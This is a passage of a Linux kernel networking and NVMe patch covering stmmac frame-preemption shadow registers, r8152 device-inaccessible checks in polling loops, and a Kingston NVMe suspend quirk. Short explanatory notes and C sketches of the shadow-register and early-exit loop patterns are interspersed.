+ 		value |= SVER;
+-	} else {
+-		value &= ~SVER;
++	else if (type == MPACKET_RESPONSE)
+ 		value |= SRSP;
+-	}
+ 
+ 	writel(value, ioaddr + MAC_FPE_CTRL_STS);
+ }
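
Because the status flags in MAC_FPE_CTRL_STS are clear-on-read, the driver now keeps the enable bit in a software shadow (cfg->fpe_csr) and always writes from the shadow rather than doing a read-modify-write on the live register. The shadow-register pattern in isolation (register access mocked; values illustrative):

    #include <stdint.h>
    #include <stdio.h>

    #define EFPE 0x1u
    #define SVER 0x2u

    static uint32_t fake_mmio;                  /* stand-in for the device reg */
    static void reg_write(uint32_t v) { fake_mmio = v; }

    struct fpe_cfg { uint32_t fpe_csr; };       /* software shadow */

    /* Never read the live register: its status bits clear on read, so a
     * read-modify-write could silently consume a pending event. */
    static void fpe_send_verify(struct fpe_cfg *cfg)
    {
        reg_write(cfg->fpe_csr | SVER);
    }

    int main(void)
    {
        struct fpe_cfg cfg = { .fpe_csr = EFPE }; /* FPE enabled */
        fpe_send_verify(&cfg);
        printf("wrote 0x%x\n", (unsigned)fake_mmio); /* EFPE | SVER */
        return 0;
    }
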
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac5.h b/drivers/net/ethernet/stmicro/stmmac/dwmac5.h
+index 53c138d0ff480..34e620790eb37 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac5.h
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac5.h
+@@ -153,9 +153,11 @@ int dwmac5_est_configure(void __iomem *ioaddr, struct stmmac_est *cfg,
+ 			 unsigned int ptp_rate);
+ void dwmac5_est_irq_status(void __iomem *ioaddr, struct net_device *dev,
+ 			   struct stmmac_extra_stats *x, u32 txqcnt);
+-void dwmac5_fpe_configure(void __iomem *ioaddr, u32 num_txq, u32 num_rxq,
++void dwmac5_fpe_configure(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++			  u32 num_txq, u32 num_rxq,
+ 			  bool enable);
+ void dwmac5_fpe_send_mpacket(void __iomem *ioaddr,
++			     struct stmmac_fpe_cfg *cfg,
+ 			     enum stmmac_mpacket_type type);
+ int dwmac5_fpe_irq_status(void __iomem *ioaddr, struct net_device *dev);
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index f30e08a106cbe..c2181c277291b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -1441,7 +1441,8 @@ static int dwxgmac3_est_configure(void __iomem *ioaddr, struct stmmac_est *cfg,
+ 	return 0;
+ }
+ 
+-static void dwxgmac3_fpe_configure(void __iomem *ioaddr, u32 num_txq,
++static void dwxgmac3_fpe_configure(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++				   u32 num_txq,
+ 				   u32 num_rxq, bool enable)
+ {
+ 	u32 value;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/hwif.h b/drivers/net/ethernet/stmicro/stmmac/hwif.h
+index 592b4067f9b8f..b2b9cf04bc726 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/hwif.h
++++ b/drivers/net/ethernet/stmicro/stmmac/hwif.h
+@@ -392,9 +392,11 @@ struct stmmac_ops {
+ 			     unsigned int ptp_rate);
+ 	void (*est_irq_status)(void __iomem *ioaddr, struct net_device *dev,
+ 			       struct stmmac_extra_stats *x, u32 txqcnt);
+-	void (*fpe_configure)(void __iomem *ioaddr, u32 num_txq, u32 num_rxq,
++	void (*fpe_configure)(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++			      u32 num_txq, u32 num_rxq,
+ 			      bool enable);
+ 	void (*fpe_send_mpacket)(void __iomem *ioaddr,
++				 struct stmmac_fpe_cfg *cfg,
+ 				 enum stmmac_mpacket_type type);
+ 	int (*fpe_irq_status)(void __iomem *ioaddr, struct net_device *dev);
+ };
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 9f76c2f7d513b..69aac8ed84f67 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -957,7 +957,8 @@ static void stmmac_fpe_link_state_handle(struct stmmac_priv *priv, bool is_up)
+ 	bool *hs_enable = &fpe_cfg->hs_enable;
+ 
+ 	if (is_up && *hs_enable) {
+-		stmmac_fpe_send_mpacket(priv, priv->ioaddr, MPACKET_VERIFY);
++		stmmac_fpe_send_mpacket(priv, priv->ioaddr, fpe_cfg,
++					MPACKET_VERIFY);
+ 	} else {
+ 		*lo_state = FPE_STATE_OFF;
+ 		*lp_state = FPE_STATE_OFF;
+@@ -5704,6 +5705,7 @@ static void stmmac_fpe_event_status(struct stmmac_priv *priv, int status)
+ 		/* If user has requested FPE enable, quickly response */
+ 		if (*hs_enable)
+ 			stmmac_fpe_send_mpacket(priv, priv->ioaddr,
++						fpe_cfg,
+ 						MPACKET_RESPONSE);
+ 	}
+ 
+@@ -7028,6 +7030,7 @@ static void stmmac_fpe_lp_task(struct work_struct *work)
+ 		if (*lo_state == FPE_STATE_ENTERING_ON &&
+ 		    *lp_state == FPE_STATE_ENTERING_ON) {
+ 			stmmac_fpe_configure(priv, priv->ioaddr,
++					     fpe_cfg,
+ 					     priv->plat->tx_queues_to_use,
+ 					     priv->plat->rx_queues_to_use,
+ 					     *enable);
+@@ -7046,6 +7049,7 @@ static void stmmac_fpe_lp_task(struct work_struct *work)
+ 			netdev_info(priv->dev, SEND_VERIFY_MPAKCET_FMT,
+ 				    *lo_state, *lp_state);
+ 			stmmac_fpe_send_mpacket(priv, priv->ioaddr,
++						fpe_cfg,
+ 						MPACKET_VERIFY);
+ 		}
+ 		/* Sleep then retry */
+@@ -7060,6 +7064,7 @@ void stmmac_fpe_handshake(struct stmmac_priv *priv, bool enable)
+ 	if (priv->plat->fpe_cfg->hs_enable != enable) {
+ 		if (enable) {
+ 			stmmac_fpe_send_mpacket(priv, priv->ioaddr,
++						priv->plat->fpe_cfg,
+ 						MPACKET_VERIFY);
+ 		} else {
+ 			priv->plat->fpe_cfg->lo_fpe_state = FPE_STATE_OFF;
+@@ -7472,6 +7477,7 @@ int stmmac_suspend(struct device *dev)
+ 	if (priv->dma_cap.fpesel) {
+ 		/* Disable FPE */
+ 		stmmac_fpe_configure(priv, priv->ioaddr,
++				     priv->plat->fpe_cfg,
+ 				     priv->plat->tx_queues_to_use,
+ 				     priv->plat->rx_queues_to_use, false);
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+index 773e415cc2de6..390c900832cd2 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+@@ -1073,6 +1073,7 @@ disable:
+ 
+ 	priv->plat->fpe_cfg->enable = false;
+ 	stmmac_fpe_configure(priv, priv->ioaddr,
++			     priv->plat->fpe_cfg,
+ 			     priv->plat->tx_queues_to_use,
+ 			     priv->plat->rx_queues_to_use,
+ 			     false);
+diff --git a/drivers/net/hyperv/Kconfig b/drivers/net/hyperv/Kconfig
+index ca7bf7f897d36..c8cbd85adcf99 100644
+--- a/drivers/net/hyperv/Kconfig
++++ b/drivers/net/hyperv/Kconfig
+@@ -3,5 +3,6 @@ config HYPERV_NET
+ 	tristate "Microsoft Hyper-V virtual network driver"
+ 	depends on HYPERV
+ 	select UCS2_STRING
++	select NLS
+ 	help
+ 	  Select this option to enable the Hyper-V virtual network driver.
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 345e341d22338..4d833781294a4 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -763,7 +763,7 @@ enum rtl_register_content {
+ 
+ /* rtl8152 flags */
+ enum rtl8152_flags {
+-	RTL8152_UNPLUG = 0,
++	RTL8152_INACCESSIBLE = 0,
+ 	RTL8152_SET_RX_MODE,
+ 	WORK_ENABLE,
+ 	RTL8152_LINK_CHG,
+@@ -1244,7 +1244,7 @@ int set_registers(struct r8152 *tp, u16 value, u16 index, u16 size, void *data)
+ static void rtl_set_unplug(struct r8152 *tp)
+ {
+ 	if (tp->udev->state == USB_STATE_NOTATTACHED) {
+-		set_bit(RTL8152_UNPLUG, &tp->flags);
++		set_bit(RTL8152_INACCESSIBLE, &tp->flags);
+ 		smp_mb__after_atomic();
+ 	}
+ }
+@@ -1255,7 +1255,7 @@ static int generic_ocp_read(struct r8152 *tp, u16 index, u16 size,
+ 	u16 limit = 64;
+ 	int ret = 0;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	/* both size and indix must be 4 bytes align */
+@@ -1299,7 +1299,7 @@ static int generic_ocp_write(struct r8152 *tp, u16 index, u16 byteen,
+ 	u16 byteen_start, byteen_end, byen;
+ 	u16 limit = 512;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	/* both size and indix must be 4 bytes align */
+@@ -1529,7 +1529,7 @@ static int read_mii_word(struct net_device *netdev, int phy_id, int reg)
+ 	struct r8152 *tp = netdev_priv(netdev);
+ 	int ret;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	if (phy_id != R8152_PHY_ID)
+@@ -1545,7 +1545,7 @@ void write_mii_word(struct net_device *netdev, int phy_id, int reg, int val)
+ {
+ 	struct r8152 *tp = netdev_priv(netdev);
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (phy_id != R8152_PHY_ID)
+@@ -1750,7 +1750,7 @@ static void read_bulk_callback(struct urb *urb)
+ 	if (!tp)
+ 		return;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (!test_bit(WORK_ENABLE, &tp->flags))
+@@ -1842,7 +1842,7 @@ static void write_bulk_callback(struct urb *urb)
+ 	if (!test_bit(WORK_ENABLE, &tp->flags))
+ 		return;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (!skb_queue_empty(&tp->tx_queue))
+@@ -1863,7 +1863,7 @@ static void intr_callback(struct urb *urb)
+ 	if (!test_bit(WORK_ENABLE, &tp->flags))
+ 		return;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	switch (status) {
+@@ -2607,7 +2607,7 @@ static void bottom_half(struct tasklet_struct *t)
+ {
+ 	struct r8152 *tp = from_tasklet(tp, t, tx_tl);
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (!test_bit(WORK_ENABLE, &tp->flags))
+@@ -2650,7 +2650,7 @@ int r8152_submit_rx(struct r8152 *tp, struct rx_agg *agg, gfp_t mem_flags)
+ 	int ret;
+ 
+ 	/* The rx would be stopped, so skip submitting */
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags) ||
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags) ||
+ 	    !test_bit(WORK_ENABLE, &tp->flags) || !netif_carrier_ok(tp->netdev))
+ 		return 0;
+ 
+@@ -2857,6 +2857,8 @@ static void rtl8152_nic_reset(struct r8152 *tp)
+ 		ocp_write_byte(tp, MCU_TYPE_PLA, PLA_CR, CR_RST);
+ 
+ 		for (i = 0; i < 1000; i++) {
++			if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++				break;
+ 			if (!(ocp_read_byte(tp, MCU_TYPE_PLA, PLA_CR) & CR_RST))
+ 				break;
+ 			usleep_range(100, 400);
+@@ -3050,7 +3052,7 @@ static int rtl_enable(struct r8152 *tp)
+ 
+ static int rtl8152_enable(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	set_tx_qlen(tp);
+@@ -3137,7 +3139,7 @@ static int rtl8153_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	set_tx_qlen(tp);
+@@ -3169,7 +3171,7 @@ static void rtl_disable(struct r8152 *tp)
+ 	u32 ocp_data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -3186,6 +3188,8 @@ static void rtl_disable(struct r8152 *tp)
+ 	rxdy_gated_en(tp, true);
+ 
+ 	for (i = 0; i < 1000; i++) {
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			break;
+ 		ocp_data = ocp_read_byte(tp, MCU_TYPE_PLA, PLA_OOB_CTRL);
+ 		if ((ocp_data & FIFO_EMPTY) == FIFO_EMPTY)
+ 			break;
+@@ -3193,6 +3197,8 @@ static void rtl_disable(struct r8152 *tp)
+ 	}
+ 
+ 	for (i = 0; i < 1000; i++) {
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			break;
+ 		if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_TCR0) & TCR0_TX_EMPTY)
+ 			break;
+ 		usleep_range(1000, 2000);
+@@ -3623,7 +3629,7 @@ static u16 r8153_phy_status(struct r8152 *tp, u16 desired)
+ 		}
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			break;
+ 	}
+ 
+@@ -3655,7 +3661,7 @@ static void r8153b_ups_en(struct r8152 *tp, bool enable)
+ 			int i;
+ 
+ 			for (i = 0; i < 500; i++) {
+-				if (test_bit(RTL8152_UNPLUG, &tp->flags))
++				if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 					return;
+ 				if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_BOOT_CTRL) &
+ 				    AUTOLOAD_DONE)
+@@ -3697,7 +3703,7 @@ static void r8153c_ups_en(struct r8152 *tp, bool enable)
+ 			int i;
+ 
+ 			for (i = 0; i < 500; i++) {
+-				if (test_bit(RTL8152_UNPLUG, &tp->flags))
++				if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 					return;
+ 				if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_BOOT_CTRL) &
+ 				    AUTOLOAD_DONE)
+@@ -4062,8 +4068,8 @@ static int rtl_phy_patch_request(struct r8152 *tp, bool request, bool wait)
+ 	for (i = 0; wait && i < 5000; i++) {
+ 		u32 ocp_data;
+ 
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
+-			break;
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			return -ENODEV;
+ 
+ 		usleep_range(1000, 2000);
+ 		ocp_data = ocp_reg_read(tp, OCP_PHY_PATCH_STAT);
+@@ -5381,6 +5387,8 @@ static void wait_oob_link_list_ready(struct r8152 *tp)
+ 	int i;
+ 
+ 	for (i = 0; i < 1000; i++) {
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			break;
+ 		ocp_data = ocp_read_byte(tp, MCU_TYPE_PLA, PLA_OOB_CTRL);
+ 		if (ocp_data & LINK_LIST_READY)
+ 			break;
+@@ -5395,6 +5403,8 @@ static void r8156b_wait_loading_flash(struct r8152 *tp)
+ 		int i;
+ 
+ 		for (i = 0; i < 100; i++) {
++			if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++				break;
+ 			if (ocp_read_word(tp, MCU_TYPE_USB, USB_GPHY_CTRL) & GPHY_PATCH_DONE)
+ 				break;
+ 			usleep_range(1000, 2000);
+@@ -5517,6 +5527,8 @@ static int r8153_pre_firmware_1(struct r8152 *tp)
+ 	for (i = 0; i < 104; i++) {
+ 		u32 ocp_data = ocp_read_byte(tp, MCU_TYPE_USB, USB_WDT1_CTRL);
+ 
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++			return -ENODEV;
+ 		if (!(ocp_data & WTD1_EN))
+ 			break;
+ 		usleep_range(1000, 2000);
+@@ -5673,6 +5685,8 @@ static void r8153_aldps_en(struct r8152 *tp, bool enable)
+ 		data &= ~EN_ALDPS;
+ 		ocp_reg_write(tp, OCP_POWER_CFG, data);
+ 		for (i = 0; i < 20; i++) {
++			if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
++				return;
+ 			usleep_range(1000, 2000);
+ 			if (ocp_read_word(tp, MCU_TYPE_PLA, 0xe000) & 0x0100)
+ 				break;
+@@ -6026,7 +6040,7 @@ static int rtl8156_enable(struct r8152 *tp)
+ 	u32 ocp_data;
+ 	u16 speed;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	r8156_fc_parameter(tp);
+@@ -6084,7 +6098,7 @@ static int rtl8156b_enable(struct r8152 *tp)
+ 	u32 ocp_data;
+ 	u16 speed;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	set_tx_qlen(tp);
+@@ -6270,7 +6284,7 @@ out:
+ 
+ static void rtl8152_up(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8152_aldps_en(tp, false);
+@@ -6280,7 +6294,7 @@ static void rtl8152_up(struct r8152 *tp)
+ 
+ static void rtl8152_down(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -6295,7 +6309,7 @@ static void rtl8153_up(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153_u1u2en(tp, false);
+@@ -6335,7 +6349,7 @@ static void rtl8153_down(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -6356,7 +6370,7 @@ static void rtl8153b_up(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -6380,7 +6394,7 @@ static void rtl8153b_down(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -6417,7 +6431,7 @@ static void rtl8153c_up(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -6498,7 +6512,7 @@ static void rtl8156_up(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -6571,7 +6585,7 @@ static void rtl8156_down(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		return;
+ 	}
+@@ -6709,7 +6723,7 @@ static void rtl_work_func_t(struct work_struct *work)
+ 	/* If the device is unplugged or !netif_running(), the workqueue
+ 	 * doesn't need to wake the device, and could return directly.
+ 	 */
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags) || !netif_running(tp->netdev))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags) || !netif_running(tp->netdev))
+ 		return;
+ 
+ 	if (usb_autopm_get_interface(tp->intf) < 0)
+@@ -6748,7 +6762,7 @@ static void rtl_hw_phy_work_func_t(struct work_struct *work)
+ {
+ 	struct r8152 *tp = container_of(work, struct r8152, hw_phy_work.work);
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (usb_autopm_get_interface(tp->intf) < 0)
+@@ -6875,7 +6889,7 @@ static int rtl8152_close(struct net_device *netdev)
+ 	netif_stop_queue(netdev);
+ 
+ 	res = usb_autopm_get_interface(tp->intf);
+-	if (res < 0 || test_bit(RTL8152_UNPLUG, &tp->flags)) {
++	if (res < 0 || test_bit(RTL8152_INACCESSIBLE, &tp->flags)) {
+ 		rtl_drop_queued_tx(tp);
+ 		rtl_stop_rx(tp);
+ 	} else {
+@@ -6908,7 +6922,7 @@ static void r8152b_init(struct r8152 *tp)
+ 	u32 ocp_data;
+ 	u16 data;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	data = r8152_mdio_read(tp, MII_BMCR);
+@@ -6952,7 +6966,7 @@ static void r8153_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153_u1u2en(tp, false);
+@@ -6963,7 +6977,7 @@ static void r8153_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			break;
+ 	}
+ 
+@@ -7092,7 +7106,7 @@ static void r8153b_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -7103,7 +7117,7 @@ static void r8153b_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			break;
+ 	}
+ 
+@@ -7174,7 +7188,7 @@ static void r8153c_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_u1u2en(tp, false);
+@@ -7194,7 +7208,7 @@ static void r8153c_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			return;
+ 	}
+ 
+@@ -8023,7 +8037,7 @@ static void r8156_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	ocp_data = ocp_read_byte(tp, MCU_TYPE_USB, USB_ECM_OP);
+@@ -8044,7 +8058,7 @@ static void r8156_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			return;
+ 	}
+ 
+@@ -8119,7 +8133,7 @@ static void r8156b_init(struct r8152 *tp)
+ 	u16 data;
+ 	int i;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	ocp_data = ocp_read_byte(tp, MCU_TYPE_USB, USB_ECM_OP);
+@@ -8153,7 +8167,7 @@ static void r8156b_init(struct r8152 *tp)
+ 			break;
+ 
+ 		msleep(20);
+-		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++		if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 			return;
+ 	}
+ 
+@@ -9219,7 +9233,7 @@ static int rtl8152_ioctl(struct net_device *netdev, struct ifreq *rq, int cmd)
+ 	struct mii_ioctl_data *data = if_mii(rq);
+ 	int res;
+ 
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return -ENODEV;
+ 
+ 	res = usb_autopm_get_interface(tp->intf);
+@@ -9321,7 +9335,7 @@ static const struct net_device_ops rtl8152_netdev_ops = {
+ 
+ static void rtl8152_unload(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	if (tp->version != RTL_VER_01)
+@@ -9330,7 +9344,7 @@ static void rtl8152_unload(struct r8152 *tp)
+ 
+ static void rtl8153_unload(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153_power_cut_en(tp, false);
+@@ -9338,7 +9352,7 @@ static void rtl8153_unload(struct r8152 *tp)
+ 
+ static void rtl8153b_unload(struct r8152 *tp)
+ {
+-	if (test_bit(RTL8152_UNPLUG, &tp->flags))
++	if (test_bit(RTL8152_INACCESSIBLE, &tp->flags))
+ 		return;
+ 
+ 	r8153b_power_cut_en(tp, false);
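
Beyond the rename from RTL8152_UNPLUG to RTL8152_INACCESSIBLE, the substantive r8152 change is that every register-polling wait loop now tests the flag on each iteration, so a device that vanishes mid-wait is abandoned immediately instead of spinning out the full timeout. The loop shape, as a sketch (the flag mocks test_bit(); return codes mirror -ENODEV/-ETIMEDOUT):

    #include <stdbool.h>
    #include <stdio.h>

    static volatile bool inaccessible;       /* set when the USB device drops */

    static bool reg_ready(void) { return false; } /* never ready in this demo */
    static void sleep_ms(int ms) { (void)ms; }

    static int wait_for_reset(void)
    {
        for (int i = 0; i < 1000; i++) {
            if (inaccessible)            /* bail instead of burning the timeout */
                return -19;              /* -ENODEV */
            if (reg_ready())
                return 0;
            sleep_ms(1);
        }
        return -110;                     /* -ETIMEDOUT */
    }

    int main(void)
    {
        inaccessible = true;             /* simulate surprise removal */
        printf("rc=%d\n", wait_for_reset());
        return 0;
    }
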
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 69f9e69208f68..118bf08a708b9 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -154,6 +154,11 @@ enum nvme_quirks {
+ 	 * No temperature thresholds for channels other than 0 (Composite).
+ 	 */
+ 	NVME_QUIRK_NO_SECONDARY_TEMP_THRESH	= (1 << 19),
++
++	/*
++	 * Disables simple suspend/resume path.
++	 */
++	NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND	= (1 << 20),
+ };
+ 
+ /*
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 886c3fc9578e4..3d01290994d89 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3093,6 +3093,18 @@ static unsigned long check_vendor_combination_bug(struct pci_dev *pdev)
+ 		if ((dmi_match(DMI_BOARD_VENDOR, "LENOVO")) &&
+ 		     dmi_match(DMI_BOARD_NAME, "LNVNB161216"))
+ 			return NVME_QUIRK_SIMPLE_SUSPEND;
++	} else if (pdev->vendor == 0x2646 && (pdev->device == 0x2263 ||
++		   pdev->device == 0x500f)) {
++		/*
++		 * Exclude some Kingston NV1 and A2000 devices from
++		 * NVME_QUIRK_SIMPLE_SUSPEND. Do a full suspend to save a
++		 * lot of energy with s2idle sleep on some TUXEDO platforms.
++		 */
++		if (dmi_match(DMI_BOARD_NAME, "NS5X_NS7XAU") ||
++		    dmi_match(DMI_BOARD_NAME, "NS5x_7xAU") ||
++		    dmi_match(DMI_BOARD_NAME, "NS5x_7xPU") ||
++		    dmi_match(DMI_BOARD_NAME, "PH4PRX1_PH6PRX1"))
